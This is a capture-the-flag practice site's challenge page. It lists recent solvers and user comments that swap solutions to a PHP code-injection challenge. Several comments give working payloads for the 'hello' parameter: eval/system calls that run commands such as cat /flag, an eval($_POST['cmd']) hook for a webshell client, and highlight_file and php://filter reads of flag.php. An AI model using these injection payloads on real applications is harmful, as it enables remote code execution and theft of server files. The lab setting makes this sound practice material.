评分(10)
解题动态
zcc0217 攻破了该题 13小时前
覃允哥哥 攻破了该题 15小时前
陈宇星 攻破了该题 15小时前
派大森 攻破了该题 16小时前
lye 攻破了该题 16小时前
wwwwxxxx 攻破了该题 17小时前
15971997955 攻破了该题 20小时前
2406100127 攻破了该题 21小时前
打不溜溜溜梅 攻破了该题 21小时前
typ11 攻破了该题 22小时前
18162807523 攻破了该题 22小时前
adminmator 攻破了该题 22小时前
St@r 攻破了该题 1天前
13966774026 攻破了该题 1天前
longlong 攻破了该题 1天前
wuy1 攻破了该题 1天前
yxyyxy 攻破了该题 1天前
缘为冰 攻破了该题 1天前
容大晋 攻破了该题 1天前
评论
yiya咿呀 20天前
举报
url/?hello=eval(system('cat /flag'))
道法自然 25天前
举报
蚁剑直接 url/?hello=eval($_POST['cmd')
1nfinix 1月前
举报
构造payload: ?hello=);highlight_file('flag.php');// 或者 ?hello=);system('cat flag.php');//
lins11 1月前
举报
/?hello=file_get_contents(%27php://filter/read=convert.base64-encode/resource=flag.php%27) ->base64解码
叱咤月海鱼鱼猫 2月前
举报
?hello=highlight_file('flag.php')
banfang 3月前
举报
点击场景后将代码发送给豆包等一分钟基本上就可以了
pks0 3月前
举报
?hello=1);highlight_file(%27flag.php%27);//
一个姓⎝李⎠的师傅~ 4月前
举报
知其然,不知其所以然,以后还是不会类似的题目:(下面是我写了 1 天的思路,保证你看完以后一切都明白了!!!) https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#fYY9d
pipipikaqiu 1月前
举报
写的好详细,太好了啊
一个姓⎝李⎠的师傅~ 1月前
举报
@想好思路再支付 有帮助就好,感谢老铁的认可!!!
想好思路再支付 1月前
举报
思路讲的真好啊李师傅
ubudj 4月前
举报
?hello=file(%27flag.php%27) ,%27 是单引号(')的 URL 编码形式。 确保 file() 函数能正确识别要读取的文件名
默认 5月前
举报
hello=a=system('ls'),发现能输出东西,剩下的就是ls换成你想要做的命令,然后试试cat flag.php 这个cat是输出东西的,然后换成其他的东西都行,cat不行就tac,能出来答案 ps:在根目录下有一个叫做flag的文件,这里用 cat /flag 是没有问题的